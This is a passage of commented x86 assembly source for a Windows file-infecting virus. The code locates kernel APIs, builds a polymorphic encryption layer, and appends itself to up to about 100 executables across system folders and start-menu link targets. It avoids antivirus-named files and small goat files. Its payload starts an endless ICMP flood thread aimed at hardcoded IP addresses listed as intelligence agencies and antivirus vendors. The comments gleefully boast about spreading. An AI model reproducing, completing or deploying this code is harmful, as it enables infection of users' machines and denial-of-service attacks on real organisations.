call GetAPI3

lea esi, [ebp+ADVAPI32Names]


lea edi, [ebp+XRegOpenKeyExA]
mov ebx, [ebp+ADVHandle]
push 3d
pop ecx
call GetAPI3

lea esi, [ebp+WSOCK32Names]


lea edi, [ebp+Xsocket]
mov ebx, [ebp+W32Handle]
push 3d
pop ecx
call GetAPI3

; ***************************************************************************
; ------------------[ Outbreak ! Here we start infecting ]-------------------
; ***************************************************************************

; Now we got everything we need to


; start infecting some files *eg*
; First of all we retrieve the
; foldernames of the current folder,
; the system folder, and the windows folder
; these are the folders we start to infect
lea edi, [ebp+curdir]
push edi
push 7Fh
call dword ptr [ebp+XGetCurrentDirectoryA]

call genPoly ; before we infect anything, we


; create a poly decryptor used for
; all files we infect = slow poly !

mov [ebp+InfCounter], 10d ; Number of files we want to infect !


call InfectCurDir ; first of all we infect the current directory

or ebp, ebp ; if this is the first generation, we infect just


jz ExecuteHost ; the first directory ( makes it easier to infect
; just some files .. *g*
; we also don't start the payload !

push 7Fh ; buffer - size


; 7fh = 127d = max lenght of Directory name
lea edi, [ebp+windir] ; Pointer to the offset where we save the directory
push edi
call dword ptr [ebp+XGetWindowsDirectoryA]

lea edi, [ebp+windir] ; then we infect the windows directory


push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
call InfectCurDir

; we save both directory's in the same buffer


push 7Fh ; so we save 127 Bytes of the Buffersize
lea edi, [ebp+windir]
push edi
call dword ptr [ebp+XGetSystemDirectoryA]

lea edi, [ebp+windir] ; and the system directory ..


push edi
call dword ptr [ebp+XSetCurrentDirectoryA]
mov [ebp+InfCounter], 10d
call InfectCurDir

; if everything went fine, we have


; infected now up to 30 files !
; Is this enough ?
; ( please note that this is a rhetorical question *g* )
; We want more !

; ***************************************************************************
; -----------------------[ Parse Directory's ]-------------------------------
; ***************************************************************************

InitParsing:

mov [ebp+InfCounter], 30d ; let's parse some directorys for


; 30 more files !

lea edi, [ebp+RootDir]


call dword ptr [ebp+XSetCurrentDirectoryA]
call ParseFolder
; if we are not able to access the registry we
; infect another 20 Files in the System-Directory

cmp dword ptr [ebp+XRegOpenKeyExA], 0h


je InfectWinDirAgain
call GetStartMenue ; last but not least, we try to parse the
; start-menue folder ( follow the LNK's )
; to get 20 more files
; with some luck, we infect 100 files each run
; all over the HD *g*
; I think this can be called successfull spreading *g*
lea edi, [ebp+windir]
call dword ptr [ebp+XSetCurrentDirectoryA]

InfectWinDirAgain:
mov [ebp+InfCounter], 20d
call ParseFolder ; let's parse the startmenue and follow all
; LNK-Files inside ;)

jmp PayLoad ; start the evil part of this thingie ..

ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0
jbe EndParsing ; we infected enough ? ok, leave !

lea esi, [ebp+Folders]


Call FindFirstFileProc
inc eax
jz EndParsing ; If there are no directorys we return
dec eax ; otherwise we save the handle

GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one

lea esi, [ebp+WFD_szFileName]


cmp byte ptr [esi], '.' ; we will not parse into . or ..
je NoThisOne ; directorys

push 03h
pop ecx
call GetRand

dec edx ; if division-rest (edx) = 1


jz ParseNewDir ; we get this directory

NoThisOne:

call FindNextFileProc

test eax, eax


jnz GetOtherDir

EndParseDir2: ; we close the search - Handle

mov eax, dword ptr [ebp+FindHandle]


push eax
call dword ptr [ebp+XFindClose]
EndParsing: ; we just return
ret

ParseNewDir: ; we got a direcory, let's change to it


; and infect it.. *eg*
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]

lea esi, [ebp+WFD_szFileName]


push esi
call dword ptr [ebp+XSetCurrentDirectoryA]

jmp ParseFolder

; ***************************************************************************
; -----------------[ Let's get the Startmenue folder ]-----------------------
; ***************************************************************************

GetStartMenue: ; Let's try to open HKEY_USERS registry Key

lea esi, [ebp+RegHandle]


push esi
push 001F0000h ; complete access
push 0h ; reserved
lea esi, [ebp+SubKey]
push esi
push 80000003h ; HKEY_USERS
call dword ptr [ebp+XRegOpenKeyExA]

test eax, eax ; if we failed opening the key, we return


jnz NoStartMenue

; let's get the value


lea esi, [ebp+BufferSize]
push esi
lea esi, [ebp+windir]
push esi
lea esi, [ebp+ValueType]
push esi ; Type of Value
push 0 ; reserved
lea esi, [ebp+Value]
push esi ; ValueName
mov eax, [ebp+RegHandle]
push eax ; Reg-Key Handle
call dword ptr [ebp+XRegQueryValueExA]

mov eax, dword ptr [ebp+RegHandle]


push eax
call dword ptr [ebp+XRegCloseKey]

NoStartMenue:

ret

SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0


Value db 'Start Menu',0
ValueType dd 0h ; Type of registry Value
BufferSize dd 7Fh ; size of buffer
; ***************************************************************************
; ----------------[ API - Tables and some other data ]-----------------------
; ***************************************************************************

; Misc Data .. ;)
Folders db '*.',0 ; search for directory's
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:

; Here follow the tables of the api's we use


; for our virus, if you want to know what they
; do exactly simply check the Win32
; Programmer's Reference
; I won't explain them ( I think the names of them
; makes it clear enough *g* )

Kernel32Names: ; 17d API's we want from Kernel32.dll

NumberOfKernel32APIS equ 17d

db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'SetFileAttributesA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetWindowsDirectoryA', 0
db 'GetSystemDirectoryA', 0
db 'GetCurrentDirectoryA', 0
db 'SetCurrentDirectoryA', 0
db 'GetFileAttributesA', 0
db 'GetTickCount', 0
db 'CreateThread',0
db 'GetSystemTime',0

ImageHLPNames:
db 'CheckSumMappedFile', 0h

ADVAPI32Names:
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0

WSOCK32Names:
db 'socket',0
db 'WSACleanup',0
db 'WSAStartup',0
db 'closesocket',0
db 'sendto',0
db 'setsockopt',0

; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************

; esi points to the Table of Names


; edi to the offsets
; ebx contains the module-handle
; ecx the number of API's
GetAPI3:
push ecx ; save ecx
push esi ; push api-name
push ebx ; Push Module-Handle
; call GetProcAddress

call dword ptr [ebp+XGetProcAddress]


stosd ; store api-offset

pop ecx ; did we get them all ?


dec ecx
jz EndApi3 ; if yes then return

push ecx ; otherwise move esi to next API-Name

SearchZero: ; we search for the end of the current


cmp byte ptr [esi], 0h
je GotZero ; api name ( always 0h ) and increase
inc esi
jmp SearchZero

GotZero:
inc esi
pop ecx ; get ecx ( counter )

jmp GetAPI3 ; retrieve Next API

EndApi3:
ret

; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************

SearchAPI1: ; In this procedure we search for the first 2 API's


; clear the counter
and word ptr [ebp+counter], 0h

mov eax, [ebp+KernelAddy] ; Load the PE-Header Offset

mov esi, [eax+78h] ; Get Export Table Address


add esi, [ebp+MZAddy] ; normalize RVA
add esi, 1Ch ; skip not needed data
; now we gave the Address Table RVA-Offset in esi

lodsd ; Get Address Table RVA


add eax, [ebp+MZAddy] ; convert to VA and save it
mov dword ptr [ebp+ATableVA], eax

lodsd ; Get Name Pointer Table RVA


add eax, [ebp+MZAddy] ; make it VA and save it
mov dword ptr [ebp+NTableVA], eax

lodsd ; Get Ordinal Table RVA


add eax, [ebp+MZAddy] ; guess what ? *g*
mov dword ptr [ebp+OTableVA], eax

mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi

SearchNextApi1:
push esi ; Save Pointer Table
lodsd
add eax, [ebp+MZAddy] ; make it VA

mov esi, eax ; API Name in the Kernel Export API


mov edi, edx ; API we are looking for
push ecx ; save the size

cld ; Clear direction Flag


rep cmpsb ; Compare it
pop ecx
jz FoundApi1 ; Are they equal ?

pop esi ; Get the Pointer Table


add esi, 4h ; Set Pointer to the next api
inc word ptr [ebp+counter]
cmp word ptr [ebp+counter], 2000h
je NotFoundApi1
jmp SearchNextApi1 ; test next API

FoundApi1:
pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )

movzx eax, word ptr [ebp+counter]


shl eax, 1h ; multiply eax with 2
; Make eax Point to the right entry inside the
; Ordinal Table
add eax, dword ptr [ebp+OTableVA]
xor esi, esi ; clear esi
xchg eax, esi ; make esi point to the entry
lodsw ; get Ordinal in AX
shl eax, 2h ; eax * 4
add eax, dword ptr [ebp+ATableVA]
mov esi, eax ; esi points to the address RVA
lodsd ; eax = address RVA
add eax, [ebp+MZAddy] ; Make it VA

ret ; Return with API-Addy in eax

NotFoundApi1:
xor eax, eax ; We didn't find the API we need :(
ret ; We set EAX to 0 to show we have to
; return to the host..

; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************

ExecuteHost: ; Here we execute the original program

lea edi, [ebp+curdir] ; we return to the original directory..


push edi
call dword ptr [ebp+XSetCurrentDirectoryA]

or ebp, ebp ; if this is a virus of the first generation


jz FirstGenHost ; we can't return to a host, so we
; stop this with ExitProcess..
Error_ExecuteHost:
mov eax, dword ptr [ebp+SEH_Save]
push eax
mov fs:[0], esp
mov eax,12345678h ; here we return to
org $-4 ; the old entry point
retEIP dd 0h ; of the infected file

add eax,12345678h
org $-4
retBas dd 0h

jmp eax

FirstGenHost:
push 0h ; Stop executing this stuff ( first Generation
call ExitProcess ; only )

OldEIP dd 0h ; Old Entry Point


OldBase dd 0h ; Old Imagebase

NewEIP dd 0h ; New Entry Point ( points to our virus.. )

; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************

GetKernel: ; Here we try to retrieve the Kernel


; set search range
mov byte ptr [ebp+K32Trys], 5h

GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; Did we pass our limit of 50 pages ?

call CheckMZSign ; Has this Page a DOS EXE-Header ?


jnc CheckPE

GK2:
sub esi, 10000h ; Get the next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; Check it

CheckPE: ; Let's check if we really found


mov edi, [esi+3Ch] ; the Kernel32.dll PE-Header
add edi, esi
call CheckPESign ; check for PE-Sign

jnc CheckDLL ; check for the DLL-Flag


jmp GK2

CheckDLL:
add edi, 16h ; check for the Dll-Flag
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
jne GK2 ; if it is no dll go on searching

KernelFound: ; we found the Kernel32.dll


sub edi, 16h ; set edi to the PE - Header
xchg eax, edi ; save PE address in eax
xchg ebx, esi ; save MZ address in ebx
cld
ret

NoKernel: ; if not found we don't set the carriage flag


stc
ret ; return if not found

K32Trys db 5h ; Search-Range

; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************

InfectCurDir: ; Here we infect the files in the current directory


; we use the FindFirstFile - FindNextFile API's
; to scan all files for PE-Executables and
; LNK-Files.
lea esi, [ebp+filemask]
call FindFirstFileProc

inc eax
jz EndInfectCurDir1 ; If there are no files, we return
dec eax

InfectCurDirFile:
; filename in esi
lea esi, [ebp+WFD_szFileName]
call InfectFile ; Try to infect it !

cmp [ebp+InfCounter], 0h ; if we infected enough files


jna EndInfectCurDir2 ; we return

call FindNextFileProc

test eax, eax


jnz InfectCurDirFile

EndInfectCurDir2: ; we close the search - Handle

push dword ptr [ebp+FindHandle]


call dword ptr [ebp+XFindClose]

EndInfectCurDir1: ; we just return


ret

InfCounter db 0h ; Counter for the number of files we infect


; at max in the current directory
; ( could take too long if we want to infect them
; all )

FindHandle dd 0h ; The handle for the FindFirstFile API

filemask db '*.*', 0 ; we search for all files, not just exe files

; these structures are nessecairy


; for the FindFileFirst - FindFileNext API's

; ***************************************************************************
; ---------------------[ Prepare infection of file ]------------------------
; ***************************************************************************
InfectFile: ; Here we prepare to infect the file
; the filename is in [ebp+WFD_szFileName]
; we open it and check if it is something
; we are able to infect...
; esi points to the filename..

cmp byte ptr [esi], '.' ; check if we got .. or .


je NoInfection
; if the file is smaller than
; 200 Bytes it will not get checked or
; infected !

cmp dword ptr [ebp+WFD_nFileSizeLow], 200d


jbe NoInfection
; we also don't infect it if it is too big
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection

call CheckFileName ; check for AV-Files


jc NoInfection

; Get File-Attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XGetFileAttributesA]
; save them
mov dword ptr [ebp+Attributes], eax

inc eax
jz NoInfection ; if we failed we don't infect
dec eax

push 80h ; clean attributes


lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]
or eax, eax ; if we fail, we don't open the file
jz NoInfection ; if we have no access to set the attributes,
; we will surely not be allowed to change the file itself

call OpenFile ; open the file


jc NoInfection ; if we failed we don't infect..

mov esi, eax


call CheckMZSign ; if it is an EXE file, we go on
jc CheckLNK ; otherwise we test if it is a LNK

cmp word ptr [eax+3Ch], 0h


je CheckLNK

xor esi, esi ; get the start of the PE-Header


mov esi, [eax+3Ch]
; if it lies outside the file we skip it
cmp dword ptr [ebp+WFD_nFileSizeLow], esi
jb Notagoodfile

add esi, eax

mov edi, esi


call CheckPESign ; check if it is an PE-Executable
jc Notagoodfile
; check infection mark --> DDoS
; if it is there the file is already infected..

cmp dword ptr [esi+4Ch], 'SoDD'


jz Notagoodfile

mov bx, word ptr [esi+16h]; get characteristics


and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
je Notagoodfile ; we will not infect dll-files

mov bx, word ptr [esi+16h]; get characteristics again


and bx, 00002h ; we check if it is no OBJ or something else..
cmp bx, 00002h
jne Notagoodfile

call InfectEXE ; ok, infect it !


; if there occoured an error
; while mapping the file again,
; we don't need to unmap & close it
jc NoInfection
jmp Notagoodfile

CheckLNK: ; check if we got an LNK-File


mov esi, dword ptr [ebp+MapAddress]
cmp word ptr [esi], 'L' ; check for sign
jne UnMapFile ; if it is no LNK File we close it

call InfectLNK

Notagoodfile:
call UnMapFile ; we store the file..
; we restore the file-attributes

push dword ptr [ebp+Attributes]


lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]

NoInfection:
ret

; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************

OpenFile:

xor eax,eax ; let's open the file


push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; name of file
call dword ptr [ebp+XCreateFileA]

inc eax
jz Closed ; if there is an error we don't infect the file
dec eax ; now the handle is in eax
; we save it
mov dword ptr [ebp+FileHandle],eax

; if we map a file normal, we map it with the size


; in the Find32-Data
; otherwise it is in ecx
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]

CreateMap:
push ecx ; save the size

xor eax,eax ; we create a map of the file to


push eax ; be able to edit it
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]

mov dword ptr [ebp+MapHandle],eax

pop ecx ; get the size again..


test eax, eax ; if there is an error we close the file
jz CloseFile ; no infection today :(

xor eax,eax ; we map the file.. *bla*


push ecx
push eax
push eax
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]

or eax,eax ; if there is an error, we unmap it


jz UnMapFile
; eax contains the offset where
; our file is mapped.. *g*

mov dword ptr [ebp+MapAddress],eax


; Clear c-flag for successful opening
clc

ret ; we successfully opened it !

UnMapFile: ; ok, unmap it

call UnMapFile2

CloseFile: ; let's close it

push dword ptr [ebp+FileHandle]


call [ebp+XCloseHandle]

Closed:
stc ; set carriage flag

ret

UnMapFile2: ; we need to unmap it some times, to


; map it again with more space..

push dword ptr [ebp+MapAddress]


call dword ptr [ebp+XUnmapViewOfFile]

push dword ptr [ebp+MapHandle]


call dword ptr [ebp+XCloseHandle]

ret

; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************

InfectEXE: ; MapAddress contains the starting offset of the file

; we will not infect exe files, which are smaller than


; 40 Kb, this is for avoiding goat files.
; AV's use them to study viruses !

cmp dword ptr [ebp+WFD_nFileSizeLow] , 0A000h


jb NoEXE

mov ecx, [esi+3Ch] ; esi points to the PE-Header


; ecx contains file-alignment
; put size in eax

mov eax, dword ptr [ebp+WFD_nFileSizeLow]


add eax, dword ptr [ebp+VirLen]

call Align ; align it and save the new size


mov dword ptr [ebp+NewSize], eax
xchg ecx, eax

pushad ; save registers


; we close the file and map it again,
; but this time we will load it
; with some more space, so we can add
; our code *eg*
call UnMapFile2
popad

call CreateMap ; we map it again with a bigger size


; if we got an error we return
jc NoEXE
; make esi point to the PE-Header again
; get offset
mov esi, dword ptr [eax+3Ch]
; make it VA
add esi, eax
mov edi, esi ; edi = esi
; eax = number of sections
movzx eax, word ptr [edi+06h]
dec eax
imul eax, eax, 28h ; multiply with size of section header
add esi, eax ; make it VA
add esi, 78h ; make it point to dir table
; esi points now to the dir-table

mov edx, [edi+74h] ; get number of dir - entrys


shl edx, 3h ; multiply with 8
add esi, edx ; make point to the last section

; get the Entry Point and save it


; we need it to be able to return
; to the original file

mov eax, [edi+28h]


mov dword ptr [ebp+OldEIP], eax

; get the imagebase, also needed to


; execute original file
mov eax, [edi+34h]
mov dword ptr [ebp+OldBase], eax

mov edx, [esi+10h] ; size of raw data


; we will increase it later
mov ebx, edx
add edx, [esi+14h] ; edx = Pointer to raw-data

push edx ; save it in stack

mov eax, ebx


add eax, [esi+0Ch] ; make it VA
; this is our new EIP

mov [edi+28h], eax


mov dword ptr [ebp+NewEIP], eax

mov eax, [esi+10h] ; get size of Raw-data


push eax
add eax, dword ptr [ebp+VirLen]
; increase it
mov ecx, [edi+3Ch] ; Align it

call Align

; save it in the file as


; new size of rawdata and
mov [esi+10h], eax

pop eax ; new Virtual size


add eax, dword ptr [ebp+VirLen]
add eax, Buffersize
mov [esi+08h], eax

pop edx

mov eax, [esi+10h]


add eax, [esi+0Ch] ; New Size of Image
; save it in the file
mov [edi+50h], eax
; change section flags to make
; us have write & read access to it
; when the infected file is run
; we also set the code flag.. ;)
or dword ptr [esi+24h], 0A0000020h
; we write our infection mark to the program,
; so we will not infect it twice
; --> DDoS
mov dword ptr [edi+4Ch], 'SoDD'
push edi ; save them
push edx

push 10d
pop ecx
call GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and xchange
pop edx

mov word ptr [ebp+Key], ax


push eax ; save it 2 times

lea esi, [ebp+Virus] ; point to start of virus


add edi, dword ptr [ebp+MapAddress]
push edi ; save edi

mov ecx, dword ptr [ebp+VirLen]


; get size of virus in ecx
rep movsb ; append virus !

pop esi ; decrypt the virus


mov edi, esi
add esi, NoCrypt
mov ecx, (CryptSize / 2)

pop edx ; get key from stack


push edi ; save start
mov edi, esi

EnCryptLoop: ; decrypt with second layer


lodsw
not ax
inc dx
xchg dl, dh
xor ax, dx
xchg al, ah
stosw
loop EnCryptLoop

pop esi ; let's start decrypting with the second layer


add esi, 05h ; skip the call
mov ecx, FirstLSize ; mov size to ecx
mov edi, esi
mov edx, dword ptr [ebp+CryptType]
xor eax, eax

XorEncrypt: ; we use a simple xor


dec edx
jnz NegEncrypt
mov dl, byte ptr [ebp+PolyKey]

@Xor:
lodsb
xor al, dl
stosb
loop @Xor
jmp EndPolyCrypto

NegEncrypt:
dec edx
jnz NotEncrypt
@Neg:
lodsb
neg al
stosb
loop @Neg
jmp End2LCrypto
NotEncrypt: ; not byte ptr [esi]
dec edx
jnz IncEncrypt
@Not:
lodsb
not al
stosb
loop @Not
jmp End2LCrypto

IncEncrypt: ; inc byte ptr [esi]


dec edx
jnz DecEncrypt
@Inc:
lodsb
dec al
stosb
loop @Inc
jmp End2LCrypto

DecEncrypt: ; dec byte ptr [esi]


lodsb
inc al
stosb
loop DecEncrypt

End2LCrypto:

dec byte ptr [ebp+InfCounter]

; if we succesfully received the dll and the


; function, we create a checksum for the
; file ( needed for dll's and WinNT )
cmp [ebp+XCheckSumMappedFile], 0h
je NoCRC

lea esi, [ebp+CheckSum]


push esi
lea esi, [ebp+HeaderSum]
push esi
push dword ptr [ebp+NewSize]
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XCheckSumMappedFile]

test eax, eax ; if this failed we don't save


jz NoCRC ; the crc

mov eax, dword ptr [ebp+MapAddress]


; eax points to the dos-stub
mov esi, [eax+3Ch] ; esi points to PE-Header
add esi, eax ; save CRC in header

mov eax, dword ptr [ebp+CheckSum]


mov [esi+58h], eax

NoCRC:
ret
NoEXE: ; let's return and close the infected file
; this will also write it to disk !
stc
ret
; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************

InfectLNK: ; if we find a link file, we try to find the


; file it points to. If it is a EXE File we are able
; to infect, we do so
; this will not work with NT-LNK-Files, there we will
; receive only the Drive, where the file is located

; ok, if a LNK is bigger than 1 Meg, it is none


; we check .. ;)
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h
ja NoLNK

; get the start addy in esi, and and the size


mov esi, dword ptr [ebp+MapAddress]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
xor edx, edx
add esi, ecx ; we start checking at the end of the file
; for a valid filename in it
CheckLoop:
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
jne LNKSearch ; in the Drive

inc edx ; there are 2 times 2 dots, when checking from


cmp edx, 2d ; the end of the LNK, we need the 2.nd
je PointsDetected

LNKSearch: ; go on searching
dec esi
loop CheckLoop
; if we end here, we did not find the two dots.. :(
NoLNK:

ret

PointsDetected: ; we found the drive ( two dots ... *g* )


; esi points to them, now we need to check
; for the start of the name..

cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a


je NoLNK ; single drive ( may happen in NT / 2k )

PointsDetected2:
dec esi
cmp byte ptr [esi], 0h
je NameDetected

loop PointsDetected2 ; ecx still takes care, that we don't


; search too far..
jmp NoLNK ; nothing found ? return..

NameDetected: ; ok, esi points now to the name of the file


; so we try a FindFileFirst to get the information
; first, we save the information in the WIN32_FIND_DATA
; then we try to find the file.
inc esi
push esi ; save it

lea esi, [ebp+WIN32_FIND_DATA]


lea edi, [ebp+Buffer] ; save the old WIN32_FIND_DATA
mov ecx, 337d ; and some more data
rep movsb

lea edi, [ebp+WIN32_FIND_DATA]


xor eax, eax ; clean this field
mov ecx, 337d
rep stosb

pop esi

call FindFirstFileProc

inc eax
jz RestoreLNK ; If there are no files, we return
dec eax
; otherwise we save the handle

; if we went here, we know the file exists


; esi still points to the filename including the
; directory, we save this in the win32_Find_DATA
; field, because the name there contains no path

lea edi, [ebp+WFD_szFileName]


mov ecx, 259d ; we just move 259 Bytes, so there is still a ending
; Zero if the name is longer and we just get a simple error
; and not an SEH or some other shit
rep movsb
lea esi, [ebp+WFD_szFileName]
call InfectFile ; esi points to the filename again, so we infect it ;)

push dword ptr [ebp+LNKFindHandle]


call dword ptr [ebp+XFindClose]

RestoreLNK:
lea edi, [ebp+WIN32_FIND_DATA]
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
mov ecx, 337d ; and some other data
rep movsb

ret ; return to find more files

LNKFindHandle dd 0h ; here we save the search-handle

; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************

PayLoad: ; here we handle the payload of the virus *eg*

cmp dword ptr [ebp+W32Handle],0


jne ExecuteHost

cmp dword ptr [ebp+XCreateThread],0


je ExecuteHost ; we better check this, cause this api does not exist in 2k

lea eax, [ebp+SystemTime] ; retrieve current date, time,.. whatever


push eax
call dword ptr [ebp+XGetSystemTime]
lea esi, [ebp+wDayOfWeek] ; get the day
xor eax, eax
lodsw

shl eax, 2h ; multiply with 4


; get Target
lea esi, [ebp+TargetTable]
add esi, eax
lea edi, [ebp+Target_IP] ; write IP to Destination Address Field
movsd
; we get a nice target for the payload
; and create a new thread to fulfill it ;)

push offset threadID ; here we save the thread ID


push 0h
push 0h
push offset PingFlood ; here starts the code of the new thread
push 0h
push 0h
call dword ptr [ebp+XCreateThread]

jmp ExecuteHost ; we're finished, so we execute the host-file

PingFlood: ; this is the thread of the payload !


; here are we doing the really evil thingies ;)
; we will start pinging a server ;P

lea eax, [ebp+offset WSA_DATA]


push eax ; where is it..
push 0101h ; required version
call dword ptr [ebp+XWSAStartup]

push 1 ; We want to use the icmp protocoll


push 3 ; SOCK_STREAM
push 2 ; Address Format
call dword ptr [ebp+Xsocket]

mov dword ptr [ebp+ICMP_Handle], eax

push 4 ; set the options ( timeout, not really


; nessecairy in this case *g* )
lea eax, [ebp+offset Timeout]
push eax
push 1006h
push 0FFFFh
push eax
call dword ptr [ebp+Xsetsockopt]

; we need to create a checksum for the packet


lea esi, [ebp+ICMP_Packet]; nothing serious just some additions

push 6 ; we do this for 6 words


pop ecx ; = 12 bytes
xor edx, edx

CreateICMP_CRC: ; load one


lodsw
movzx eax, ax ; mov it to eax ( clean upper part of eax )
add edx, eax ; add it to edx ( we just add them all )
loop CreateICMP_CRC

movzx eax, dx ; add the lower ( dx ) and the upper part of


shr edx, 16d ; edx together in eax
add eax, edx

movzx edx, ax ; save ax in edx


shr eax, 16d ; mov upper part of eax to ax ( clean upper part )
add eax, edx ; add old ax to new ax ( add upper part to lower part )

not eax ; eax = - 1 * ( eax + 1 )


; this is our checksum
mov word ptr [ebp+ICMP_CRC], ax

push 16d ; get it out, we send our packet !


lea eax, [ebp+offset Info]
push eax
push 0
push 12d
lea eax, [ebp+offset ICMP_Packet]
push eax
push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xsendto]

CloseSocket: ; close the socket, to stay stable ;)


push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xclosesocket]
call dword ptr [ebp+XWSACleanup]

jmp PingFlood ; heh that was fun, let's do it again ;)

Timeout dd 100000d ; 10000 ms Timeout ( we don't really care about it *g* )


Info:
dw 2h
dw 0h
Target_IP db 0d, 0d, 0d, 0d
dd 0h ; there we will fill in the target ip address ;)
ICMP_Packet db 8h
db 0h
ICMP_CRC dw 0h ; for the CRC Calculation of the ping
dd 0h
dd 0h
dd 0h
ICMP_Handle dd 0h ; the handle of the open Socket

TargetTable: ; these are our targets


; please note again, that i don't want to damage one
; of these servers ! I choose them because I think that
; they will stand such an attack if anyone will ever release this
; into the wild !!!

db 62d, 156d, 146d, 231d ; Sunday = www.bundesnachrichtendienst.de


db 195d, 154d, 220d, 34d ; Monday = French Secret Service ( dgse.citeweb.net )
db 216d, 122d, 8d, 245d ; Tuesday = www.avp.com ( AV )
db 216d, 41d, 20d, 75d ; Wednesday = www.lockdown2000.com
db 194d, 252d, 6d, 47d ; Thursday = www.f-secure.com
db 208d, 226d, 167d, 23d ; Friday = www.norton.com
db 205d, 178d, 21d, 3d ; Saturday = www.zonelabs.com

; ***************************************************************************
; -------------------------[ Align-Procedure ]-------------------------------
; ***************************************************************************
; lets align the size..
; eax - size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - new size
ret

; ***************************************************************************
; --------------------------[ FindFile Procedures ]--------------------------
; ***************************************************************************

FindFirstFileProc:
lea eax, [ebp+WIN32_FIND_DATA]
push eax
push esi
call dword ptr [ebp+XFindFirstFileA]
mov dword ptr [ebp+FindHandle], eax
ret

FindNextFileProc:
lea edi, [ebp+WFD_szFileName]
mov ecx, 276d ; we clear these fields !
xor eax, eax
rep stosb

lea eax, [ebp+WIN32_FIND_DATA]


push eax
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindNextFileA]
ret

CheckFileName:
pushad
lea esi, [ebp+WFD_szFileName]
mov edi, esi
mov ecx, 260d

ConvertLoop: ; Convert to upper cases


lodsb
cmp al, 96d
jb Convert
cmp al, 123d
ja Convert
or al, al
jz EndConvert
sub al, 32d
Convert:
stosb
loop ConvertLoop

EndConvert:
lea edi, [ebp+WFD_szFileName]
lea esi, [ebp+FileNames]
mov ecx, 3h
FileNameCheck: ; check for av-names
push ecx ; i don't want to infect them
mov ecx, 260d

CheckON:
lodsb
repnz scasb
or ecx, ecx
jnz AVFile

pop ecx
inc esi
loop FileNameCheck

jmp EndFileNameCheck

AVFile:
mov al, byte ptr [esi] ; check if the second char also matches
cmp byte ptr [edi], al
je GotAVFile

dec esi
jmp CheckON

GotAVFile:
pop ecx ; clear stack
popad
stc ; set carriage flag
ret

EndFileNameCheck:
popad
clc
ret

FileNames db 'AV' ; we avoid these names


db 'AN' ; so we will not infect an AV and
db 'DR' ; alert the user

;****************************************************************************
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
; ***************************************************************************
; we check here for PE and MZ signs
; to identify the Executable we want to infect
; I do this a little bit different than usual *g*
CheckPESign:
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
jae NoPESign

cmp dword ptr [edi], 'DP' ; check if lower or equal to PD


jbe NoPESign

clc ; all that's left is PE


ret

NoPESign:
stc ; set carriage flag
ret

CheckMZSign:
cmp word ptr [esi], '[M'
jae NoPESign

cmp word ptr [esi], 'YM'


jbe NoPESign

clc
ret
ret

; ***************************************************************************
; ----------------[ Generate a pesudo-random Number ]------------------------
; ***************************************************************************

GetRand:
; generate a pseudo-random NR.
; based on some initial registers
push ecx ; and the Windows - Ontime
add ecx, eax
call dword ptr [ebp+XGetTickCount]
add eax, ecx
add eax, ecx
add eax, edx
add eax, edi
add eax, ebp
add eax, dword ptr [ebp+PolyLen]
add eax, dword ptr [ebp+LoopLen]

sub eax, esi


sub eax, ebx

pop ecx
add eax, ecx

add al, byte ptr [ebp+Reg1]


